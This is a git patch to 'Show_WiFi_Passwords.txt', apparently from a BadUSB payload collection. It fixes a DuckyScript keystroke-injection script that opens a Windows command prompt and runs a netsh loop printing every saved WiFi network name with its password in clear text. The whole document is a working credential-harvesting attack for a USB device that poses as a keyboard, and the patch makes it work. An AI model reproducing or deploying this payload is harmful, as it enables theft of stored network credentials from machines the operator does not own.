From 446f0c984cdec3c4bbcbf7b004f15843a80d4efa Mon Sep 17 00:00:00 2001 From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com> Date: Mon, 20 Jun 2022 22:27:07 -0700 Subject: [PATCH] Update Show_WiFi_Passwords.txt --- BadUSB/Show_WiFi_Passwords.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/BadUSB/Show_WiFi_Passwords.txt b/BadUSB/Show_WiFi_Passwords.txt index 44585cf48..d351133f6 100644 --- a/BadUSB/Show_WiFi_Passwords.txt +++ b/BadUSB/Show_WiFi_Passwords.txt @@ -5,6 +5,6 @@ STRING cmd DELAY 500 ENTER DELAY 1500 -STRING for /f "skip=9 tokens=12 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content" +STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content" DELAY 250 ENTER